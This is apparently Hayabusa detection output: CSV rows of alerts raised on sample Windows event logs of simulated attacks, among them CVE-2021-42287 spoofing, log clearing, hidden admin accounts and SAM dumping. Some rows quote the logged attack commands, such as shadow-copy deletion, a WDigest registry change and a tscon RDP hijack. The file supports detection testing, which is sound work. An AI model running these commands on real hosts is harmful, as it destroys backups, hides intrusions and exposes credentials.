+09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx +2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 
2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.306 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: 
HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File 
Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 
+2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx +2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx +2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 
0x542c77d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx +2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-08 07:05:07.640 
+09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! 
(Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: 
A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 
0x567758,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 
0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 